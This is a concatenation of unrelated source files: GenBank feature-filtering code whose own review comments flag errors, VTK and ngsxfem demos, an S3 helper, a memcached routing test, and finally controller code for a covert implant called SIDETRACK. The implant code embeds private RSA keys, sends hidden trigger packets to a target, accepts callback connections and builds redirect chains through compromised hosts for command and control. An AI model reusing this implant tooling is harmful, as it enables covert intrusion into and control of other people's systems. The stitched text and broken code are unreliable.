        if Decimal(hmm_coverage) >= Decimal(enter.coverage) and \
           (
            (enter.min_length != 0 and enter.min_length <= feature_length <= enter.max_length) or \
            (enter.min_length == False and feature_length == enter.max_length) \
           ) and \
           (score >= enter.score or enter.score is False):
            # Insert the new feature in genomic-coordinate order.
            for i in reversed(range(len(record.features))):
                if record.features[i].location.start < \
                        my_feature.location.start and \
                        (enter.eval is False or e_value <= enter.eval or
                         enter.score is not False):
                    for c in range(len(allowed_features_list)-1):
                        if allowed_features_list[c].location.start <= \
                                my_feature.location.start <= \
                                allowed_features_list[c+1].location.start:
                            record.features.insert(i+1, my_feature)
                            break
                    break
                if i == 0 and \
                        record.features[i].location.start > \
                        my_feature.location.start:
                    record.features.insert(i, my_feature)
                    break
                if i == len(record.features)-1 and \
                        record.features[i].location.start < \
                        my_feature.location.start:
                    record.features.insert(i+1, my_feature)
                    break
    # Collect candidate repeat features (with their indices) for filtering.
    # NOTE(review): qualifier['rpt_family'] raises KeyError when -q did not
    # supply an rpt_family qualifier but a feature carries one — confirm
    # intended usage upstream.
    repeats = []
    for feature in record.features:
        if 'rpt_family' in feature.qualifiers.keys():
            if (feature.qualifiers['rpt_family'] == qualifier['rpt_family'] and \
                enter.duplicate is True) or enter.duplicate is False:
                repeats.append([feature, record.features.index(feature)])
    if enter.insert:
        # Drop hits that land inside (or on the wrong side of) gene features.
        hit_list = []
        for i in range(len(record.features)):
            if 'CHECK' in record.features[i].qualifiers.keys():
                hit_list.append(record.features[i])
        for i in reversed(range(len(hit_list))):
            i = len(hit_list)-1-i
            for n in range(len(allowed_features_list)-1):
                # NOTE(review): wrong_promoter_strand is not defined anywhere
                # in this file — this path raises NameError when -i is used;
                # confirm against the upstream GeneGen/SigmoID sources.
                if (
                    is_within_feature(allowed_features_list,
                                      n,
                                      hit_list[i]) and \
                    not is_within_boundary(allowed_features_list,
                                           n,
                                           hit_list[i])
                   ) or \
                   wrong_promoter_strand(allowed_features_list[n],
                                         hit_list[i],
                                         allowed_features_list[n+1]):
                    hit_list.pop(i)
                    break
        for i in reversed(range(len(record.features))):
            if 'CHECK' in record.features[i].qualifiers.keys() and \
               not any(record.features[i] == hit for hit in hit_list):
                record.features.pop(i)
    if enter.palindromic:
        # Remove the redundant partner of near-identical opposite-strand hits.
        del_counter = 0
        deleted = []
        for feature in repeats:
            if feature not in deleted:
                for n in range(repeats.index(feature)+1, len(repeats)):
                    further = repeats[n][0]
                    if further.location.strand != feature[0].location.strand and \
                       0 <= (further.location.start-feature[0].location.start) <= 2 and \
                       0 <= (further.location.end-feature[0].location.end) <= 2 and \
                       'CHECK' in record.features[feature[1]-del_counter].qualifiers.keys():
                        del record.features[feature[1]-del_counter]
                        del_counter += 1
                        deleted.append(feature)
                    elif enter.duplicate is True:
                        if further.location.strand != feature[0].location.strand and \
                           0 <= (further.location.start-feature[0].location.start) <= 2 and \
                           0 <= (further.location.end-feature[0].location.end) <= 2 and \
                           'CHECK' not in record.features[feature[1]-del_counter].qualifiers.keys() and \
                           'CHECK' in record.features[repeats[n][1]-del_counter].qualifiers.keys():
                            del record.features[repeats[n][1]-del_counter]
                            del_counter += 1
                            deleted.append(further)
    if enter.duplicate is True and \
       'rpt_family' in qualifier.keys():
        # Same-family, same-location duplicates: keep the higher-scoring one.
        repeats = []
        del_counter = 0
        for feature in record.features:
            if 'rpt_family' in feature.qualifiers.keys():
                if feature.qualifiers['rpt_family'] == qualifier['rpt_family']:
                    repeats.append([feature, record.features.index(feature)])
        for repeat in repeats:
            for n in range(repeats.index(repeat)+1, len(repeats)):
                further_repeat = repeats[n][0]
                if 0 <= (further_repeat.location.start - repeat[0].location.start) <= 2 and \
                   0 <= (further_repeat.location.end - repeat[0].location.end) <= 2 and \
                   repeat[0].qualifiers['rpt_family'] == further_repeat.qualifiers['rpt_family']:
                    if score_parser(repeat[0]) >= \
                       score_parser(further_repeat):
                        del record.features[repeat[1]-del_counter]
                    elif score_parser(repeat[0]) < \
                         score_parser(further_repeat):
                        # NOTE(review): repeats[n][0] is the feature object,
                        # not its index — subtracting an int from it raises
                        # TypeError; repeats[n][1] was probably intended.
                        del record.features[repeats[n][0]-del_counter]
                    del_counter += 1
                    break
    # Strip the run marker, report and write the surviving features.
    output_features = []
    for feature in record.features:
        if 'CHECK' in feature.qualifiers.keys():
            del feature.qualifiers['CHECK']
            output_features.append(feature)
    score_list = sorting_output_features(output_features)
    score_list.sort()
    output(score_list, output_features)
    print ('\nFeatures added:', len(output_features))
    print ('\n' + "-"*50)
    SeqIO.write(record, output_handle, 'genbank')
    total += int(len(output_features))
output_handle.close()
# Restore the original LOCUS lines (topology) into the written file.
newlines = dna_topology(enter.output_file, circular_vs_linear)
new_output_file = open(enter.output_file, 'w')
new_output_file.writelines(newlines)
new_output_file.close()
input_handle.close()
t_end = process_time()
print ('Total features: ', total)
print ('CPU time: {0:.3f} sec'.format(t_end-t_start))
print ('\n' + "="*50)
| gpl-3.0 | -6,934,267,850,099,133,000 | 41.085409 | 109 | 0.50723 | false | 4.087798 | false | false | false |
lorensen/VTKExamples | src/Python/VisualizationAlgorithms/Cutter.py | 1 | 1710 | #!/usr/bin/env python
# A simple script to demonstrate the vtkCutter function
import vtk
def main():
    """Render a translucent cube together with its planar cross-section.

    The cube is cut by an x-normal plane through x = 10 (vtkCutter); the
    resulting contour is drawn as yellow lines over the aquamarine cube.
    """
    palette = vtk.vtkNamedColors()

    # Cube source, 40 x 30 x 20.
    box = vtk.vtkCubeSource()
    box.SetXLength(40)
    box.SetYLength(30)
    box.SetZLength(20)
    box_mapper = vtk.vtkPolyDataMapper()
    box_mapper.SetInputConnection(box.GetOutputPort())

    # Cutting plane (XZ cut uses normal (1,0,0); XY: (0,0,1); YZ: (0,1,0)).
    cut_plane = vtk.vtkPlane()
    cut_plane.SetOrigin(10, 0, 0)
    cut_plane.SetNormal(1, 0, 0)

    # The cutter produces the cross-section polydata.
    section = vtk.vtkCutter()
    section.SetCutFunction(cut_plane)
    section.SetInputConnection(box.GetOutputPort())
    section.Update()
    section_mapper = vtk.vtkPolyDataMapper()
    section_mapper.SetInputConnection(section.GetOutputPort())

    # Actor for the cut contour.
    section_actor = vtk.vtkActor()
    section_actor.GetProperty().SetColor(palette.GetColor3d("Yellow"))
    section_actor.GetProperty().SetLineWidth(2)
    section_actor.SetMapper(section_mapper)

    # Actor for the translucent cube.
    box_actor = vtk.vtkActor()
    box_actor.GetProperty().SetColor(palette.GetColor3d("Aquamarine"))
    box_actor.GetProperty().SetOpacity(0.3)
    box_actor.SetMapper(box_mapper)

    # Renderer, window and interactor wiring.
    renderer = vtk.vtkRenderer()
    renderer.AddActor(section_actor)
    renderer.AddActor(box_actor)

    window = vtk.vtkRenderWindow()
    window.AddRenderer(renderer)
    window.SetSize(600, 600)
    interactor = vtk.vtkRenderWindowInteractor()
    interactor.SetRenderWindow(window)

    renderer.SetBackground(palette.GetColor3d("Silver"))
    window.Render()
    interactor.Start()


if __name__ == '__main__':
    main()
| apache-2.0 | 636,900,238,253,238,100 | 26.580645 | 103 | 0.693567 | false | 3.392857 | false | false | false |
ngsxfem/ngsxfem | demos/fictdom_mlset.py | 1 | 4537 | """
In this example we solve an unfitted Poisson problem similar to the one in
`fictdom.py`, however this time with the unfitted geometry being the
unit square. This example shall illustrate the functionality of ngsxfem to
solve PDE problems on geometries described via multiple level set functions.
PDE problem + Discretisation + Geometry + Implementation aspects:
-----------------------------------------------------------------
* As in fictdom.py except for the different geometry and its handling.
Used Features:
--------------
* Quadrature with respect to multiple level set functions., see the
'mlset_pde' jupyter tutorial.
* MultiLevelsetCutInfo, see the 'mlset_basic' jupyter tutorial.
* DomainTypeArray convenience layer, see the 'mlset_basic' jupyter
tutorial.
* Restricted BilinearForm, jupyter tutorial `basics`.
* Cut Differential Symbols, jupyter tutorials `intlset` and `cutfem`.
"""
# ------------------------------ LOAD LIBRARIES -------------------------------
from netgen.geom2d import SplineGeometry
from ngsolve import *
from xfem import *
from xfem.mlset import *
ngsglobals.msg_level = 2

# -------------------------------- PARAMETERS ---------------------------------
# Domain corners (background mesh rectangle enclosing the unit square)
ll, ur = (-0.2, -0.2), (1.2, 1.2)
# Initial mesh diameter
initial_maxh = 0.4
# Number of mesh bisections
nref = 3
# Order of finite element space
k = 1
# Stabilization parameter for ghost-penalty
gamma_s = 0.5
# Stabilization parameter for Nitsche
gamma_n = 10
# ----------------------------------- MAIN ------------------------------------
# Set up the level sets, exact solution and right-hand side
def level_sets():
    """Return the four level set functions whose common NEG region is the
    unit square (sides y=0, x=1, y=1, x=0); uses the ngsolve symbols x, y.
    """
    return [-y, x - 1, y - 1, -x]
nr_ls = len(level_sets())
# Manufactured exact solution on the unit square and its data.
u_ex = 16 * x * (1 - x) * y * (1 - y)
grad_u_ex = (u_ex.Diff(x).Compile(), u_ex.Diff(y).Compile())
rhs = -(u_ex.Diff(x).Diff(x) + u_ex.Diff(y).Diff(y)).Compile()

# Geometry and mesh
geo = SplineGeometry()
geo.AddRectangle(ll, ur, bcs=("bottom", "right", "top", "left"))
ngmesh = geo.GenerateMesh(maxh=initial_maxh)
for i in range(nref):
    ngmesh.Refine()
mesh = Mesh(ngmesh)

# Level set and cut-information: P1 interpolants of each level set.
P1 = H1(mesh, order=1)
lsetsp1 = tuple(GridFunction(P1) for i in range(nr_ls))
for i, lsetp1 in enumerate(lsetsp1):
    InterpolateToP1(level_sets()[i], lsetp1)
    Draw(lsetp1, mesh, "lsetp1_{}".format(i))

# Domain described by sign combinations of the four level sets.
square = DomainTypeArray((NEG, NEG, NEG, NEG))
with TaskManager():
    square.Compress(lsetsp1)
    boundary = square.Boundary()
    boundary.Compress(lsetsp1)
mlci = MultiLevelsetCutInfo(mesh, lsetsp1)

# Element and degrees-of-freedom markers
els_if_singe = {dtt: BitArray(mesh.ne) for dtt in boundary}
facets_gp = BitArray(mesh.nedge)
hasneg = mlci.GetElementsWithContribution(square)

# Finite element space (restricted to elements with a NEG contribution)
Vhbase = H1(mesh, order=k, dgjumps=True)
Vh = Restrict(Vhbase, hasneg)
gfu = GridFunction(Vh)
hasif = mlci.GetElementsWithContribution(boundary)
Draw(BitArrayCF(hasif), mesh, "hasif")
for i, (dtt, els_bnd) in enumerate(els_if_singe.items()):
    els_bnd[:] = mlci.GetElementsWithContribution(dtt)
    Draw(BitArrayCF(els_bnd), mesh, "els_if_singe" + str(i))
# Facets needing ghost-penalty stabilization (neighbor cut elements).
facets_gp = GetFacetsWithNeighborTypes(mesh, a=hasneg, b=hasif,
                                       use_and=True)
els_gp = GetElementsWithNeighborFacets(mesh, facets_gp)
Draw(BitArrayCF(els_gp), mesh, "gp_elements")

# Bilinear and linear forms of the weak formulation
u, v = Vh.TnT()
h = specialcf.mesh_size
normals = square.GetOuterNormals(lsetsp1)

# Set up the integrator symbols
dx = dCut(lsetsp1, square, definedonelements=hasneg)
ds = {dtt: dCut(lsetsp1, dtt, definedonelements=els_if_singe[dtt])
      for dtt in boundary}
dw = dFacetPatch(definedonelements=facets_gp)

# Construct integrator: diffusion + Nitsche boundary terms + ghost penalty.
a = RestrictedBilinearForm(Vh, facet_restriction=facets_gp, check_unused=False)
a += InnerProduct(grad(u), grad(v)) * dx
for bnd, n in normals.items():
    a += -InnerProduct(grad(u) * n, v) * ds[bnd]
    a += -InnerProduct(grad(v) * n, u) * ds[bnd]
    a += (gamma_n * k * k / h) * InnerProduct(u, v) * ds[bnd]
a += gamma_s / (h**2) * (u - u.Other()) * (v - v.Other()) * dw

f = LinearForm(Vh)
f += rhs * v * dx

# Assemble and solve the linear system
f.Assemble()
a.Assemble()
gfu.vec.data = a.mat.Inverse(Vh.FreeDofs()) * f.vec
Draw(gfu, mesh, "uh")

# Post-processing: L2 and H1 (semi-norm) errors against the exact solution.
err_l2 = sqrt(Integrate((gfu - u_ex)**2 * dx.order(2 * k), mesh))
err_h1 = sqrt(Integrate((Grad(gfu) - grad_u_ex)**2 * dx.order(2 * (k - 1)),
                        mesh))
print("L2 error = {:1.5e}".format(err_l2), "H1 error = {:1.5e}".format(err_h1))
| lgpl-3.0 | 2,544,864,473,202,585,000 | 29.655405 | 79 | 0.648446 | false | 2.857053 | false | false | false |
selassid/canopener | canopener/s3file.py | 1 | 1324 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
import tempfile
from boto.s3.connection import S3Connection
def make_s3_connection(aws_access_key_id=None, aws_secret_access_key=None):
    """Factory for S3Connection objects; kept separate so tests can mock it."""
    credentials = {
        'aws_access_key_id': aws_access_key_id,
        'aws_secret_access_key': aws_secret_access_key,
    }
    return S3Connection(**credentials)
class s3file(object):
    """Callable that downloads an S3 URL into a local temporary file.

    Despite the class syntax, instantiation returns a plain temporary file
    object (not an s3file instance), positioned at the start of the
    downloaded data.
    """

    def __new__(
        cls,
        filename,
        mode='r',
        aws_access_key_id=None,
        aws_secret_access_key=None,
    ):
        """Open a local, seekable copy of the S3 object at *filename*."""
        parsed = urlparse(filename)
        # Writing back to S3 is unsupported, as is any non-S3 scheme.
        if 'w' in mode:
            raise ValueError("can't write to S3")
        if parsed.scheme != 's3':
            raise ValueError("s3file can't open non-S3 URLs")
        connection = make_s3_connection(
            aws_access_key_id=aws_access_key_id,
            aws_secret_access_key=aws_secret_access_key,
        )
        bucket = connection.get_bucket(parsed.netloc)
        key = bucket.get_key(parsed.path)
        local_copy = tempfile.TemporaryFile()
        key.get_contents_to_file(local_copy)
        local_copy.seek(0)
        return local_copy
| bsd-2-clause | -4,765,795,732,312,073,000 | 26.583333 | 75 | 0.616314 | false | 3.568733 | false | false | false |
hankshz/dockers | memcached/script/test-memcached.py | 1 | 1304 | #!/usr/bin/env python3
import time
from pymemcache.client.base import Client
# Integration test for an mcrouter prefix-routing setup: writes go to the
# master, and each slave should only receive the keys its route matches.
master = Client(('memcached-master', 11211))
slave1 = Client(('memcached-slave1', 11211))
slave2 = Client(('memcached-slave2', 11211))
slave3 = Client(('memcached-slave3', 11211))
# Invalidate all
# mcrouter seems not work properly with pymemcache flush_all
slave1.flush_all()
slave2.flush_all()
slave3.flush_all()
# Set & Get from the master
master.set('a', '1')
assert(master.get('a') == b'1')
master.set('b', '2')
assert(master.get('b') == b'2')
master.set('c', '3')
assert(master.get('c') == b'3')
master.set('d', '4')
assert(master.get('d') == b'4')
# Get from the slave1, only string starts with 'a'
slave1 = Client(('memcached-slave1', 11211))
assert(slave1.get('a') == b'1')
assert(slave1.get('b') == None)
assert(slave1.get('c') == None)
assert(slave1.get('d') == None)
# Get from the slave2, only string starts with 'b'
slave2 = Client(('memcached-slave2', 11211))
assert(slave2.get('a') == None)
assert(slave2.get('b') == b'2')
assert(slave2.get('c') == None)
assert(slave2.get('d') == None)
# Get from the slave3, only rest of strings
slave3 = Client(('memcached-slave3', 11211))
assert(slave3.get('a') == None)
assert(slave3.get('b') == None)
assert(slave3.get('c') == b'3')
assert(slave3.get('d') == b'4')
| apache-2.0 | -5,473,104,553,618,401,000 | 27.347826 | 60 | 0.663344 | false | 2.728033 | false | true | false |
DarthMaulware/EquationGroupLeaks | Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/sidetrack.py | 1 | 72163 | import base
import crypto
import echocmd
import string
import struct
import time
import re
import os
import sys
from socket import *
import rawtcp
import types
class SIDECMD(echocmd.ECHOCMD):
def __init__(self):
echocmd.ECHOCMD.__init__(self)
def TypeConvert(self, stype):
#print "In TypeConvert %d" % (stype)
if type(stype) != type(''):
if stype == 1:
stype = "A"
elif stype == 2:
stype = "NS"
elif stype == 3:
stype = "MD"
elif stype == 4:
stype = "MF"
elif stype == 5:
stype = "CNAME"
elif stype == 6:
stype = "SOA"
elif stype == 7:
stype = "MB"
elif stype == 8:
stype = "MG"
elif stype == 9:
stype = "MR"
elif stype == 10:
stype = "NULL"
elif stype == 11:
stype = "WKS"
elif stype == 12:
stype = "PTR"
elif stype == 13:
stype = "HINFO"
elif stype == 14:
stype = "MINFO"
elif stype == 15:
stype = "MX"
elif stype == 16:
stype = "TXT"
elif stype == 252:
stype = "AXFR"
elif stype == 253:
stype = "MAILB"
elif stype == 254:
stype = "MAILA"
elif stype == 255:
stype = "*"
return stype
def ConvertType(self, rtype):
if type(rtype) != type(0):
rtype = string.upper(rtype)
if rtype == "A":
rtype = 1
elif rtype == "NS":
rtype = 2
elif rtype == "MD":
rtype = 3
elif rtype == "MF":
rtype = 4
elif rtype == "CNAME":
rtype = 5
elif rtype == "SOA":
rtype = 6
elif rtype == "MB":
rtype = 7
elif rtype == "MG":
rtype = 8
elif rtype == "MR":
rtype = 9
elif rtype == "NULL":
rtype = 10
elif rtype == "WKS":
rtype = 11
elif rtype == "PTR":
rtype = 12
elif rtype == "HINFO":
rtype = 13
elif rtype == "MINFO":
rtype = 14
elif rtype == "MX":
rtype = 15
elif rtype == "TXT":
rtype = 16
elif rtype == "AXFR":
rtype = 252
elif rtype == "MAILB":
rtype = 253
elif rtype == "MAILA":
rtype = 254
elif rtype == "*":
rtype = 255
return rtype
def ClassConvert(self, rclass):
#print "In ClassConvert %d" % (rclass)
if type(rclass) != type(''):
if rclass == 1:
rclass = "IN"
elif rclass == 2:
rclass = "CS"
elif rclass == 3:
rclass = "CH"
elif rclass == 4:
rclass = "HS"
return rclass
def ConvertClass(self, rclass):
if type(rclass) != type(0):
rclass = string.upper(rclass)
if rclass == "IN":
rclass = 1
elif rclass == "CS":
rclass = 2
elif rclass == "CH":
rclass = 3
elif rclass == "HS":
rclass = 4
return rclass
def ConvertFlags(self, flags):
# qr rd ra
retFlags = 0
if type(flags) != type(0):
flags = string.upper(flags)
if flags == "RA":
retFlags = retFlags | 0x0080L
if flags == "AA":
retFlags = retFlags | 0x0400L
return retFlags
def SectionConvert(self,section):
if type(section) != type(''):
if section == 0:
section = "query"
elif section == 1:
section = "ans"
elif section == 2:
section = "auth"
elif section == 3:
section = "add"
return section
def ConvertSection(self,section):
if type(section) != type(0):
section = string.upper(section)
if section[:1] == "Q":
section = 0
elif section[:2] == "AN":
section = 1
elif section[:2] == "AU":
section = 2
elif section[:2] == "AD":
section = 3
return section
def NameConvertName(self, name):
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0]
if val >= 32 and val < 127:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.HexConvert(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.HexConvert(name, padding)
def ConvertName(self, name):
ret = ''
regExpr = re.compile("^[a-zA-Z0-9-_.]*$")
if type(name) != type(0x0L):
reg = regExpr.search(name)
if reg != None:
dots = string.splitfields(name,".")
for i in range(len(dots)):
ret = ret + chr(len(dots[i])) + dots[i]
ret = ret + '\000'
return ret
else:
return name
else:
return struct.pack("!H",name)
def FlagConvert(self, flag):
if flag == 0:
return "Ignore"
elif flag == 1:
return "Count"
elif flag == 2:
return "Active"
def HexConvert(self,data,pad=0):
ret = ''
padding = ''
for i in range(pad):
padding = padding + ' '
for i in range(len(data)):
if i % 16 == 0 and i != 0:
ret = ret + '\n' + padding
myNum = struct.unpack("!H", '\000'+data[i:i+1])[0]
ret = ret + "%02x " % myNum
ret = ret + '\n' + padding + "(%d)" % (len(data))
return ret
class SIDETRACK(base.Implant):
    """Driver object for the SIDETRACK implant.

    Holds the per-target crypto/session state and registers the shell
    commands this implant understands.
    """
    def __init__(self, session, proto):
        base.Implant.__init__(self, session, proto)
        self.name = 'SIDETRACK'
        self.newCV = None
        # Per-target options (cipher key, implant version) come from the
        # target configuration.
        self.targetopts = self.session.target.GetImplantOpts('sidetrack')
        self.version = self.targetopts['VERSION']
        # Version 2.0 implants switched the session cipher from RC5 to RC6.
        if self.version >= 2.0:
            self.cipher = crypto.rc6()
        else:
            self.cipher = crypto.rc5()
        self.cipher.SetKey(self.targetopts['KEY'])
        # NOTE(review): N/d and Nsign/dsign look like two 1024-bit RSA
        # modulus/private-exponent pairs (session vs. signing); they are only
        # consumed elsewhere -- confirm against the users of implant.N before
        # relying on that reading.
        self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL
        self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L
        self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L
        self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L
        self.packetSize = 450      # payload budget per implant packet
        # Clock skew between pyside and the target; used to translate the
        # implant's timestamps to local time.
        self.timediff = self.session.target.timediff
        self.localRedir = None     # local redirect backing a C&C connection
        self.parent = None         # upstream hop when chained through hosts
        self.children = []
        self.rules = []
    def RegisterCommands(self):
        # Map shell command names onto their ECHOCMD/SIDECMD handler classes.
        self.AddCommand('ping', echocmd.ECHOCMD_PING)
        self.AddCommand('status', echocmd.ECHOCMD_STATUS)
        self.AddCommand('done', echocmd.ECHOCMD_DONE)
        self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE)
        self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF)
        self.AddCommand('incision', echocmd.ECHOCMD_INCISION)
        self.AddCommand('rekey', echocmd.ECHOCMD_REKEY)
        self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY)
        self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY)
        self.AddCommand('key', echocmd.ECHOCMD_KEY)
        self.AddCommand('init', SIDECMD_INIT)
        self.AddCommand('dnsadd', SIDECMD_DNSADD)
        self.AddCommand('dnsrm', SIDECMD_DNSREMOVE)
        self.AddCommand('dnsset', SIDECMD_DNSSET)
        self.AddCommand('dnsaction', SIDECMD_DNSACTION)
        self.AddCommand('dnsraw', SIDECMD_DNSRAW)
        self.AddCommand('dnslist', SIDECMD_DNSLIST)
        self.AddCommand('dnsload', SIDECMD_DNSLOAD)
        self.AddCommand('dnssave', SIDECMD_DNSSAVE)
        self.AddCommand('rediradd', SIDECMD_REDIRADD)
        self.AddCommand('redirlist', SIDECMD_REDIRLIST)
        self.AddCommand('redirset', SIDECMD_REDIRSET)
        self.AddCommand('redirrm', SIDECMD_REDIRREMOVE)
        self.AddCommand('connlist', SIDECMD_CONNLIST)
        self.AddCommand('connrm', SIDECMD_CONNREMOVE)
        self.AddCommand('stunload', SIDECMD_UNLOAD)
        self.AddCommand('connect', SIDECMD_CONNECT)
        self.AddCommand('cclist', SIDECMD_CCLIST)
        self.AddCommand('ccremove', SIDECMD_CCREMOVE)
        self.AddCommand('multiaddr', SIDECMD_MULTIADDR)
##########################################################################
# HASANOTHERADDRESS class
#########################################################################
class SIDECMD_MULTIADDR(SIDECMD):
    """Record whether the target owns more than one IP address."""

    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "multiaddr"
        self.usage = "multiaddr <0|1>"
        self.info = "Let pyside know that the target has multiple addresses"

    def run(self, value=1):
        # Only updates local bookkeeping; nothing is sent to the implant.
        target = self.implant.session.target
        target.hasAnotherAddress = value
        return (1, "Value updated")
##########################################################################
# CONNECT class
#########################################################################
class SIDECMD_CONNECT(SIDECMD):
    """Establish the TCP command-and-control connection to SIDETRACK.

    Opens a local listener, optionally builds redirect rules through an
    intermediate SIDETRACK hop, fires the trigger at the target, and then
    accepts the implant's callback connection.
    """
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "connect"
        self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>"
        self.info = "Connect to SIDETRACK"
    def parseHostInfo(self,host):
        """Split "<host>:<lport>/<rport>" into (session, packed_ip, lport, rport).

        <host> may be an IP or the name of an existing session (then
        session is non-None and the IP is taken from that target).
        Raises ValueError on malformed input or wildcard ports.
        """
        #split the ip from the ports
        res = string.split(host,":")
        if len(res) == 1:
            raise ValueError, host
        elif len(res) == 2:
            ports = string.split(res[1],"/")
            if len(ports) != 2:
                raise ValueError, host
            if ports[0] == "*":
                raise ValueError, ports[0]
            else:
                ports[0] = eval(ports[0])
            if ports[1] == "*":
                raise ValueError, ports[1]
            else:
                ports[1] = eval(ports[1])
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                # host references a session
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host,ipaddr,ports[0],ports[1]
        else:
            raise ValueError, host
    def run(self,hostinfo,fport):
        """Trigger the implant on fport (0 = UDP/500 ISAKMP-style trigger)
        and accept the callback on the listener described by hostinfo."""
        # Parse the ports
        prevRule = None
        tempRule = None
        localRedir = None
        host,laddr,lport,cbport = self.parseHostInfo(hostinfo)
        if fport == 0:
            PORT = 500
        #open the listener
        try:
            sock = socket(AF_INET,SOCK_STREAM,0)
            sock.bind(('',lport))
            sock.listen(2)
        except error, message:
            return (0, "Could not open port %d %s" % (lport,message))
        # See if the user entered another host
        if host != None:
            self.implant.parent = host
            #hpn is the hop prior to host (might just be "me")
            hpn = host.implant.parent.name
            myname = host.name
            hostinfo = re.sub(myname,hpn,hostinfo)
            # Testing
            # Local (loopback) redirect on this side of the chain for the
            # callback connection.
            localRedir = REDIRECT(self,0,10800,10800,6,\
                                  self.ConvertIP(self.implant.session.target.ip), \
                                  self.ConvertIP(self.implant.session.target.ip),
                                  0,0,0,(0,0,0,0),0,0x201,lport,cbport,0,0)
            localRedir.add(0)
            self.implant.session.localRedir = localRedir
            # Add a redirect (on the previous host) for this connection
            cmd = host.GetCommand('rediradd')
            base.ccSupport = 1
            res = cmd.run("tcp",hostinfo,"%s:%d/%d"%(self.implant.session.target.ip,cbport,lport),"-tfix", "-afix","-l","3h","-c","3h")
            base.ccSupport = 0
            if res[0] == 0:
                return res
            # Let the previous implant know this redirect rule is in support
            # of a command and control connection
            prevRule = cmd.redir
            if prevRule != None:
                prevRule.ccPassthru = self.implant.session
            # Add a temporary rule to allow the trigger to be passed to target
            base.ccSupport = 1
            if fport == 0:
                res = cmd.run("udp","%s:%d/%d"%(hpn,PORT,PORT),"%s:%d/%d"%(self.implant.session.target.ip,PORT,PORT),"-tfix", "-afix")
            else:
                res = cmd.run("tcp","%s:%d/%d"%(hpn,0,fport),"%s:%d/%d"%(self.implant.session.target.ip,fport,0),"-tfix")
            base.ccSupport = 0
            base.db(2,"%d.%d.%d.%d"%(res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff))
            if res[0] == 0:
                if prevRule != None:
                    prevRule.remove()
                return (0, "Unable to establish redir for port %d: %s"%(fport,res[1]))
            tempRule = cmd.redir
        else:
            localRedir = None
            prevRule = None
            self.implant.session.localRedir = None
        #add the rule
        # Local listener rule: use the upstream rule's ST_ip when the hop's
        # target is known to have multiple addresses.
        if tempRule == None or (tempRule != None and \
                                cmd.implant.session.target.hasAnotherAddress == 0):
            rule = base.redir.listen(laddr,\
                                     self.ConvertIP(self.implant.session.target.ip),\
                                     fport,lport,cbport,\
                                     self.implant.timediff, \
                                     self.implant.cipher.GetKey())
        else:
            rule = base.redir.listen(tempRule.ST_ip,\
                                     self.ConvertIP(self.implant.session.target.ip),\
                                     fport,lport,cbport,\
                                     self.implant.timediff, \
                                     self.implant.cipher.GetKey())
        #Make the connection
        if fport == 0:
            # UDP trigger to port 500: random payload with a fixed marker at
            # offsets 14-23 (looks ISAKMP-ish -- see the implant side).
            conn = socket(AF_INET,SOCK_DGRAM,0)
            conn.bind(('',PORT))
            conn.connect((self.implant.session.target.ip,PORT))
            f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null")
            d = f.read()
            f = None
            data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \
                   d[16:20] + struct.pack("!L", 0x154) + d[20:332]
            conn.send(data)
            conn.close()
            #accept
            self.implant.protocol.sock,addr = sock.accept()
        else:
            #conn = socket(AF_INET,SOCK_STREAM,0)
            # STUB: Catch this in a try statement
            try:
                # esev - 6/24/03
                #conn.connect((self.implant.session.target.ip,fport))
                #conn.close()
                #conn = None
                rawtcp.sendFakeConnection(self.implant.session.target.ip,fport)
                # STUB: Put a timeout here
                #accept
                self.implant.protocol.sock,addr = sock.accept()
            except:
                # Interrupted (typically ^C while blocked in accept): tear
                # down every rule we created and drop the session.
                base.redir.delete(rule)
                sock.close()
                sock = None
                #if conn != None:
                #    conn.close()
                if localRedir != None:
                    localRedir.remove()
                if prevRule != None:
                    prevRule.remove()
                if tempRule != None:
                    tempRule.remove()
